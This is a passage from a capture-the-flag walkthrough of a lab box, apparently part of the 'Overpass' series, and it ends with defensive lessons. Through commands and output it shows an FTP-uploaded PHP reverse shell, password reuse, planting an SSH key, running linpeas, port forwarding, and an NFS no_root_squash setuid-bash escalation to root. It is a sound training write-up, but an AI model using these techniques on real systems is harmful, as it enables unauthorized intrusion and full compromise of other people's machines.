&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;System &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;Linux ip-10-10-71-195 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Build Date &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;Oct 22 2019 08:28:36 &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Server API &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;FPM/FastCGI &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Virtual Directory Support &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;disabled &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Configuration File (php.ini) Path &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;/etc &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Loaded Configuration File &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;/etc/php.ini &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;e&#34;&gt;Scan this dir for additional .ini files &lt;/td&gt;&lt;td class=&#34;v&#34;&gt;/etc/php.d &lt;/td&gt;&lt;/tr&gt;
&lt;!-- Snipping this out because we don&#39;t really care --&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
* Connection #0 to host $TARGET_IP left intact
&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;


We have PHP, awesome. It’s reverse shell time!

Reversing a Shell

We have a handy php reverse shell located at /usr/share/webshells/php/php-reverse-shell.php on Kali linux. Alternatively, we can always get one from the net.

So first we tab open a new terminal and kickstart our listener:


nc -lvnp 4242
Listening on 0.0.0.0 4242

Then we ftp over out shell to the server, and launch it.


ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (16.3704 MB/s)
ftp> bye
221 Goodbye.

curl http://$TARGET_IP/shell.php

On our listener, we should see:


Connection received on $TARGET_IP 54054
Linux ip-10-10-71-195 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 20:32:32 up  3:51,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (871): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$

First thing’s first is to stabilize our shell, let’s try with python3


sh-4.4$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$

Web Flag

Ok let’s start hunting for the web flag. First we’ll check the /var/www directory to see if we can find anything.


cd /var/www
cd /var/www
ls -la
ls -la
total 4
drwxr-xr-x.  4 root   root     33 Nov  8 02:02 .
drwxr-xr-x. 21 root   root   4096 Nov  8 02:02 ..
drwxr-xr-x.  2 root   root      6 Sep 15 16:46 cgi-bin
drwxrwxrwx.  3 apache apache  143 Jan 25 20:32 html
cd cgi-bin
cd cgi-bin
ls -la
ls -la
total 0
drwxr-xr-x. 2 root root  6 Sep 15 16:46 .
drwxr-xr-x. 4 root root 33 Nov  8 02:02 ..

Nothing here. Flags are usually found in the user’s home directory. Let’s take a look.


cd ~
cd ~
ls -la
ls -la
total 24
drwxr-xr-x.  5 root root   63 Nov 17 20:54 .
drwxr-xr-x. 81 root root 4096 Nov  8 02:02 ..
drwxr-xr-x.  3 root root 4096 Nov  8 02:02 error
drwxr-xr-x.  3 root root 8192 Nov  8 02:02 icons
drwxr-xr-x.  3 root root  140 Nov  8 02:02 noindex
-rw-r--r--.  1 root root   38 Nov 17 20:54 web.flag
wc -c web.flag
wc -c web.flag
38 web.flag

Gaining a more stable foothold

We want to gain a more stable foothold. Let’s see if paradox’s password is the same for the server.


bash-4.4$ su paradox
su paradox
Password: ****************

Huzzah! Time to raid his home directory


cd ~
cd ~
ls -la
ls -la
total 56
drwx------. 4 paradox paradox   203 Nov 18 18:29 .
drwxr-xr-x. 4 root    root       34 Nov  8 19:34 ..
-rw-rw-r--. 1 paradox paradox 13353 Nov  8 21:23 backup.zip
lrwxrwxrwx. 1 paradox paradox     9 Nov  8 21:45 .bash_history -> /dev/null
-rw-r--r--. 1 paradox paradox    18 Nov  8  2019 .bash_logout
-rw-r--r--. 1 paradox paradox   141 Nov  8  2019 .bash_profile
-rw-r--r--. 1 paradox paradox   312 Nov  8  2019 .bashrc
-rw-rw-r--. 1 paradox paradox 10019 Nov  8 20:37 CustomerDetails.xlsx
-rw-rw-r--. 1 paradox paradox 10366 Nov  8 21:18 CustomerDetails.xlsx.gpg
drwx------. 4 paradox paradox   132 Nov  8 21:18 .gnupg
-rw-------. 1 paradox paradox  3522 Nov  8 21:16 priv.key
drwx------  2 paradox paradox    47 Nov 18 18:32 .ssh
cd .ssh
cd .ssh
ls -la
ls -la
total 8
drwx------  2 paradox paradox  47 Nov 18 18:32 .
drwx------. 4 paradox paradox 203 Nov 18 18:29 ..
-rw-------  1 paradox paradox 583 Nov 18 18:29 authorized_keys
-rw-r--r--  1 paradox paradox 583 Nov 18 18:29 id_rsa.pub

No private key, that’s too bad. But we can always inject our own key.

On the attack machine, let’s generate a new ssh key.


ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/hydra/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:SCs8tw9BrNajkYRdx+OtR3nSizpIRmXXhg9dkGe2/2Q hydra@kali
The key's randomart image is:
+---[RSA 3072]----+
|      ...  +.+.  |
|   o o .= + = +  |
|  . o ++ + * + . |
|   o *.o. = + .  |
|    O.B So + . . |
|   . *o+. o .   E|
|    .oo. o     o.|
|      .oo       .|
|        ..       |
+----[SHA256]-----+

cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjPDDF2HsKfhRK2u5cIIa4w/WDA4g7eJizrWRWg+kghrdf//gV7HhxjQ2ZsEm6Y9+KWg0NgtVhG9Rg2mcZn/rwm3loJCQFk4r/EDr2DhYz8qozMwRwL0YlL1dV+DHxke3nZPZHFa9Bf9T3YjF8P4TzUaIHx9J5uQr8pdIPzkP1a/M7JYaqiwUn9rFMCVydtKeU9Ic/Gw25pwbvOkBiccDvC9UKYqqq5DXQtlDDpuzB/PXK16Vnl4JAW5HApthbvBHK/ayy8djxxuOUpIX68WtovmUYjMXFHFKodj+OPabAxc5TFxxKjGwQYg0UrLM4Mxs0cvTrT53FLV7Zj52Yr5OtYVouKA5vtVnaMnQRbkAM+Q+QZCGpnuO/BjdQH2VOmH2EPf3WmqUhGm1k9extW6VccFnJlCsOQy0+ag2IgnQv5E4Qkg7yEBWXVUo2drXAYMiPtmcQ69RjITgHqu8ngKTRM/v7bcNrGZ3atWj9MCU3rrnHeYzzHuMH4I+FkoQFd0U= hydra@kali

The defaults are fine here as this is a disposable key.

On the target box, let’s copy our public key to the authorized keys.


 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjPDDF2HsKfhRK2u5cIIa4w/WDA4g7eJizrWRWg+kghrdf//gV7HhxjQ2ZsEm6Y9+KWg0NgtVhG9Rg2mcZn/rwm3loJCQFk4r/EDr2DhYz8qozMwRwL0YlL1dV+DHxke3nZPZHFa9Bf9T3YjF8P4TzUaIHx9J5uQr8pdIPzkP1a/M7JYaqiwUn9rFMCVydtKeU9Ic/Gw25pwbvOkBiccDvC9UKYqqq5DXQtlDDpuzB/PXK16Vnl4JAW5HApthbvBHK/ayy8djxxuOUpIX68WtovmUYjMXFHFKodj+OPabAxc5TFxxKjGwQYg0UrLM4Mxs0cvTrT53FLV7Zj52Yr5OtYVouKA5vtVnaMnQRbkAM+Q+QZCGpnuO/BjdQH2VOmH2EPf3WmqUhGm1k9extW6VccFnJlCsOQy0+ag2IgnQv5E4Qkg7yEBWXVUo2drXAYMiPtmcQ69RjITgHqu8ngKTRM/v7bcNrGZ3atWj9MCU3rrnHeYzzHuMH4I+FkoQFd0U= hydra@kali" >> authorized_keys

Now we should be able to login over ssh.

SSH (Finally)

Using the key we just generated,


ssh -i id_rsa paradox@$TARGET_IP
Last login: Mon Jan 25 20:43:46 2021

Now let’s kill off our reverse shell and see what we can do.

Sudo?

One simple check we should almost always do first is sudo. This command allows us to run commands as another user, and usually root.


sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for paradox:
Sorry, user paradox may not run sudo on ip-10-10-71-195.

Looks like the admins don’t trust paradox to not do anything rash and haven’t granted him any special privileges. Smart admins, but too bad for us.

(Lin)peas in a pod

We could sniff around manually, or we could use one of the many awesome scripts to search for us. Linpeas is one of these awesome scripts. Let’s grab the most recent version from our attack box and scp it over.


 curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  312k  100  312k    0     0  2441k      0 --:--:-- --:--:-- --:--:-- 2422k

scp -i id_rsa linpeas.sh paradox@$TARGET_IP:~/linpeas.sh
linpeas.sh

On the target, we need to set the script as executable and then run it.


chmod +x linpeas.sh
./linpeas.sh
 Starting linpeas. Caching Writable Folders...


                     β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
             β–„β–„β–„β–„β–„β–„β–„             β–„β–„β–„β–„β–„β–„β–„β–„β–„
      β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„
  β–„β–„β–„β–„     β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„
  β–„    β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„          β–„β–„β–„β–„β–„β–„               β–„β–„β–„β–„β–„β–„ β–„
  β–„β–„β–„β–„β–„β–„              β–„β–„β–„β–„β–„β–„β–„β–„                 β–„β–„β–„β–„
  β–„β–„                  β–„β–„β–„ β–„β–„β–„β–„β–„                  β–„β–„β–„
  β–„β–„                β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                  β–„β–„
  β–„            β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„   β–„β–„
  β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                β–„β–„β–„β–„
  β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„     β–„β–„β–„β–„
  β–„β–„β–„β–„   β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„      β–„ β–„β–„
  β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„     β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„
   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„        β–„          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„            β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
   β–„β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
        β–„β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
             β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
    linpeas v3.0.3 by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You must take a look at it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
  LightMangeta: Your username

...

I’m going to truncate this because it’s nearly 1300 lines, and noone wants to read through all that here ;)

So a bit further down, we see a section that is highlighted in red and yellow, very shouty.

[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

We have an NFS mount! But we didn’t see NFS anywhere on the nmap scan! This tells us that the port is probably behind a firewall. A quick google search tells us that fsid=0 means that we are using NFSv4 here. This is good, as we only have 1 port to worry about.

Forwarding all the ports!

Google also tells us that NFSv4 uses port 2049. So let’s forward that port locally.


ssh -fNL 2049:localhost:2049 -i id_rsa paradox@$TARGET_IP

Mount up

First we’ll create a mount point and then mount the drive. There’s a small hitch in that we’ll mount using localhost, as we’re forwarding that port over.


mkdir mnt
sudo mount -t nfs4 localhost:/ mnt

entering into our mount point, we can see files!


cd mnt
ls -la
total 20
drwx------ 3 hydra hydra  112 Nov 17 22:15 ./
drwxr-xr-x 8 hydra hydra 4096 Jan 25 22:25 ../
lrwxrwxrwx 1 root  root     9 Nov  8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra   18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 hydra hydra  141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 hydra hydra  312 Nov  8  2019 .bashrc
drwx------ 2 hydra hydra   61 Nov  8 03:20 .ssh/
-rw------- 1 hydra hydra   38 Nov 17 22:15 user.flag
wc -c user.flag
38 user.flag

The no_root_squash option that we saw earlier is also very interesting, It basically will allow files owned by root to keep their root privileges. Basically, your root is my root, and my root is your root.

Because we have root privileges on our attacker box, we can abuse this setting to add a sticky bit to something like bash and execute that as a user to gain root access to the target machine. Let’s see this in action.


cp /bin/bash .
sudo chown root:root ./bash
sudo chmod +s ./bash
ls -la
total 1228
drwx------ 3 hydra hydra     124 Jan 25 22:34 ./
drwxr-xr-x 8 hydra hydra    4096 Jan 25 22:25 ../
-rwsr-sr-x 1 root  root  1234376 Jan 25 22:34 bash*
lrwxrwxrwx 1 root  root        9 Nov  8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra      18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 hydra hydra     141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 hydra hydra     312 Nov  8  2019 .bashrc
drwx------ 2 hydra hydra      61 Nov  8 03:20 .ssh/
-rw------- 1 hydra hydra      38 Nov 17 22:15 user.flag

We can also modify the permissions of james' home directory to allow access to paradox.


sudo chmod +rx .
ls -la
total 1228
drwxr-xr-x 3 hydra hydra     124 Jan 25 22:34 ./
drwxr-xr-x 8 hydra hydra    4096 Jan 25 22:25 ../
-rwsr-sr-x 1 root  root  1234376 Jan 25 22:34 bash*
lrwxrwxrwx 1 root  root        9 Nov  8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra      18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 hydra hydra     141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 hydra hydra     312 Nov  8  2019 .bashrc
drwx------ 2 hydra hydra      61 Nov  8 03:20 .ssh/
-rw------- 1 hydra hydra      38 Nov 17 22:15 user.flag

Now as paradox, we should be able to run our bash with the -p option!


/home/james/bash -p
/home/james/bash: /lib64/libtinfo.so.6: no version information available (required by /home/james/bash)

Oh…darn… or is it?

Root!

Apparently it’s not as bad as we though because regardless of the error, we have do actually have root.


id
uid=1001(paradox) gid=1001(paradox) euid=0(root) egid=0(root) groups=0(root),1001(paradox)
cd /root
ls -la
total 24
dr-x------.  3 root root 141 Nov 17 23:53 .
drwxr-xr-x. 17 root root 244 Nov 18 19:16 ..
lrwxrwxrwx.  1 root root   9 Nov  8 21:44 .bash_history -> /dev/null
-rw-------.  1 root root  18 May 11  2019 .bash_logout
-rw-------.  1 root root 176 May 11  2019 .bash_profile
-rw-------.  1 root root 176 May 11  2019 .bashrc
-rw-------.  1 root root 100 May 11  2019 .cshrc
-rw-------.  1 root root  38 Nov 17 20:55 root.flag
drwxr-xr-x   2 root root  29 Nov 17 23:53 .ssh
-rw-------.  1 root root 129 May 11  2019 .tcshrc
wc -c root.flag
38 root.flag

The End?

This is the end of this chapter of the Overpass saga. Will it continue? Who knows? But I had a lot of fun with this box.

Lessons To Take Away

  1. Don’t have extraneous functionality for your websites. If you don’t need php, then don’t enable it.
  2. Obviously, don’t reuse passwords.
  3. Let’s not leave backups lying around in prod. That’s almost always a bad idea.
  4. Speaking of backups, while it was encrypted (yay), leaving the private key right next to the file is a bad idea.
  5. NFS mounts are great, though even if they’re behind a firewall, it just takes one weak point to gain access via port forwards.
  6. The no_root_squash property should never be used. You don’t need it. Ever.